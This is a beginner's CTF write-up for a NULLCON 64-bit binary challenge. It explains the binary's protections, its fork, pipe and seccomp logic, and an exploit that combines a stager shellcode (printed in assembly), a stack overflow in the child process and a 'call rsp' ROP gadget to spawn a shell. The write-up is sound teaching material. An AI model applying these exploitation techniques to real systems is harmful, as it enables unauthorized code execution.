Rating:

# NULLCON: Exploitation 2

**Category:** Binary Exploitation
**Points:** 300
**Total Solves:** Not Available
## Problem Description:
[//]: # (Description of your problem. For eg use below description as a template)
[//]: # (> This program is vulnerable to a format string attack! See if you can modify a variable by supplying a format string! The binary can be found at /home/format/ on the shell server. The source can be found [here](format.c\).)
![Image](ProblemStatement.png?raw=true "Problem Statement")

## Write-up
[//]: # (> Your write up goes here.)
I am a beginner and this is one of the hardest exploit I have done. To solve this I teamed with my buddy Grant, who was kind
enough to let me solve this one by own, and guided me through the process. We got started, and after downloading the binary named [pwn2-box.bin](pwn2-box.bin), first we had a look at the information about the file like - architecture, os, compilation flags, etc with the command `checksec pwn2-box.bin`, which gave this:
```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
```

Looking at this told us few things, lets look at the each one by one.
`Arch: amd64-64-little` tells that arhitecture is amd64-64, which means we will be dealing with 64
bit registers. little tells us that executable is buid for little endian machine.

`RELRO` aka Relocation Read Only is `Partial RELRO` which means, the ELF( Executabel and Linkable File) is
going to have .got.plt and .plt sections. Where as .plt is going to be read-only but .got.plt is
going to be writable. Just for additional info, .plt section is Procedure Linkage Table, and
.got is Global Offset Table, but .got.plt is GOT of .plt section. When RELRO is Full Relro, lazy
linking, means linking at compile time is disabled, which means linker resolves the symbol at load
time (when program starts). That implies that .got.plt will be populated at load time, once
populated it will be moved in .plt section and .plt section is marked read only. So, there is no .got.plt section in FULL RELRO. If you want read more about .plt and .got.plt section [read here](https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html) and RELRO [read here](https://mudongliang.github.io/2016/07/11/relro-a-not-so-well-known-memory-corruption-mitigation-technique.html)

There is no stack canary, can do buffer overflow easily.

NX is disabled, which means code can be executed on the stack and heap. NX enabled means there will be no segment with W^X, both write and execute permissions, and permissions of section will be enforced by OS, which mean if a section is marked as read OS will not allow write and execution in that section.

There is No PIE means all constant addreses are not going to be accessed with global offset table (GOT), instead with fix addresses.

By then, we had pretty good idea of attack vector we could use in the program.

As it's partial RELRO, we could modfify the symbols' resolved address to change the control flow, so it's worth to look at the symbos present in the binary, we checked the symbols present in the binary as:
```
$nm pwn2-box.bin
nm: pwn2-box.bin: no symbols
```
Huh.. no symbols, symbol table is stripped. We looked at the dynamic symbol resolutions:
```
$ objdump -T pwn2-box.bin

pwn2-box.bin: file format elf64-x86-64

DYNAMIC SYMBOL TABLE:
0000000000000000 DF *UND* 0000000000000000 seccomp_init
0000000000000000 w D *UND* 0000000000000000 _ITM_deregisterTMCloneTable
0000000000000000 DF *UND* 0000000000000000 seccomp_rule_add
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 getpid
0000000000000000 DF *UND* 0000000000000000 seccomp_load
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 mmap
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 __assert_fail
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 memset
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 alarm
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 pipe
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 read
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 __libc_start_main
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 signal
0000000000000000 w D *UND* 0000000000000000 __gmon_start__
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 perror
0000000000000000 w D *UND* 0000000000000000 _Jv_RegisterClasses
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 exit
0000000000000000 w D *UND* 0000000000000000 _ITM_registerTMCloneTable
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 fork
00000000006020a0 g D .data 0000000000000000 Base _edata
00000000006020a8 g D .bss 0000000000000000 Base _end
00000000006020a0 g D .bss 0000000000000000 Base __bss_start
0000000000400820 g DF .init 0000000000000000 Base _init
0000000000400ec4 g DF .fini 0000000000000000 Base _fini

```
Few symbols worth noticing were - seccomp based functions, mmap - memory is mapped into the program
at run time, memset - setting the memory, alarm - generates SIGALARM, pipe and fork together - some
inter process communication might be going on between child and parent process, read system call to
read data, signal - register a signal handler, perror - print the error, exit - to exit the
program.

Now at this point we were ready to look at the disassembled code of binary. Looking at it told us
that - program was creating a pipe, then forking a child process. Behavior of both the processes,
child and parent, is descirbed ahead: parent process registers a signal handler for few signals,
signal worth mentioning is `ALARM`. What handler does is it get's PID and exit the program with code 1. Alarm
was set up for 5sec, which means program is not going to run longer than 5 secs. After setting alarm,
it reads 4 byte of data from STDIN, use this read value as an integer and compare that it's less than
0x100000, if not it prints the error message "error" and parent process exits. Else, parent process
allocates the memory of size read earlier at random location using mmap. Further it
reads input from STDIN and writes to memory allocated with mmap. After allocating memory it initializes a seccomp on this allocated memory which can only make write, exit, exit\_group syscalls. Next is the interesting part, after setting up those seccomp rules,
it reads upto the size of allocated memory from STDIN, and write to to allocated memory, and that's not it further
executes it. Which means if we provide a shellcode that would going to be executed, but it can only do
write, exit, group\_exit calls, otherwise we could have passed a shellcode to get the flag stored in
/flag.txt file. Another important thing was to patch the alarm instructions, otherwise
it will be hard to debug as `alarm` call will call the handler and handler will exit the program.

Now the child process, it reads 1 byte from read side of PIPE, compares it with 0xA, if matched, read 4 more
bytes, treat this 4 byte as an integer, and whatever the value of integer is, read that much bytes
again from read end of PIPE and store it in buffer on stack.

Looking at this exploit seemed clear - write shellcode which will be written to mmapped memory, and
gets executed. As we could only do write system call, it's quite clear that we needed to pass the
exploit to the child process. That could be done by our shellcode by writing it to the pipe through write end, the child process will store it on stack. My first apporach was to do buffer overflow, overwrit the return address to the part of my shellcode stored at parent process mmapped memory, which upon execution will give me shell.

So my whole shellcode breakdown was going to be like this:
```
comlete shellcode = [[stager][piped content][shell code to get bash]]
piped content = [0xA][sizeof stack content][stack content]
stack content = [[0x78*'a'] + [address of shellcode to get bash]]
```

Stager is a shellcode which is going to figure out the address of piped content and write it to the
pipe from parent process to child process. Initially address of shllcode content is not known so,
stager will also update that address, as it can figure out the address where [stack content] will
start.

Piped content going to be processed by child process by reading it from read end of pipe. It has the '0xA' to satisfy the condition, the size of stack content going to be read by child process first as SIZE, then SIZE number of bytes will be read from pipe read end and store on the stack, which will cause the buffer overflow and return the control flow to my shellcode to give me shell.

Stack content is larger than buffer allocated for the data stored on stack and this will overwrite
the RBP, and store the address of [shell code to get bash] below RBP, which is return address.

Below is my stager code:
```
jmp short label1
pop_addr:
pop rsi
mov rax, rsi
add rax, 0x85; added the size of piped content
mov [rsi + 0x85 - 8], rax; placing the address for return address
xor rax, rax
mov al, 1; write system call
xor rdi, rdi
mov rdi, 4;push 4 pipe descriptor
xor rdx, rdx
mov dl, 0x85; size to copy
syscall
label1:
call pop_addr
;here is content going to be piped
;below will be another shellcode to give sh
```

Plan seemed perfect, I put hours of effort in debugging and writing the script, then executing it to get the flag, aaaaand... I got memory access violation. Because, the shellcode I was executing to get sh was on mmapped memory which belonged to parent process, and I tried to execute it from child process. I didn't do a good job of looking ahead. Well lesson was learned. But now I had bigger issue, how to execute my shellcode to get the shell. Then my buddy grant directed me toward the ROP and using RSP gadget. I was not aware of this awesome technique, so I am going to write a bit about this also. Gadgets are insturctions that are already available in program, and can be executed, if one can get to know the address of those instruction, which we are calling gadget, at run time. As, in this case we have no ASLR, no PIE, if I could find a instruction which could do `call RSP` I can run my shell code on stack, this address is not gonna change as I said there is no PIE. Searching for this gadget in the binary, I got one which could help me to execute the shellcode:

```
$ ROPgadget --binary CTFs/NULLCON/Binary-Exploit/Exploitation-2/pwn2-box.bin | grep "call rsp"
0x0000000000400f7b : call rsp
```

New plan was not much different from old one but just some changes here and there. I planned my new full shellcode to look like this:

```
comlete shellcode = [[stager][piped content]]
piped content = [0xA][sizeof stack content][stack content]
stack content = [[0x78\*'a'] + [address of ROP gadget] + [shell code to give bash]]
```

What change does is, my shellcode to get sh is getting written on stack causing buffer overflow,
and return address is pointing to gadget. So, when return statement gets executed, RSP get
incremented by +8 and it will point to the my shellcode to get sh, as the ROP gadget executes,
contorl goes to the shell code which gives the shell. The whole thing was put in the [script](solve.py). Executing this script gave the bash.

Thanks to @Digital\_Cold for guidance.
## Other write-ups and resources

* None

Original writeup (https://github.com/viz-prakash/CTF/tree/master/CTF-writeups-2018/NULLCON/Binary-Exploitation/Exploitation-2).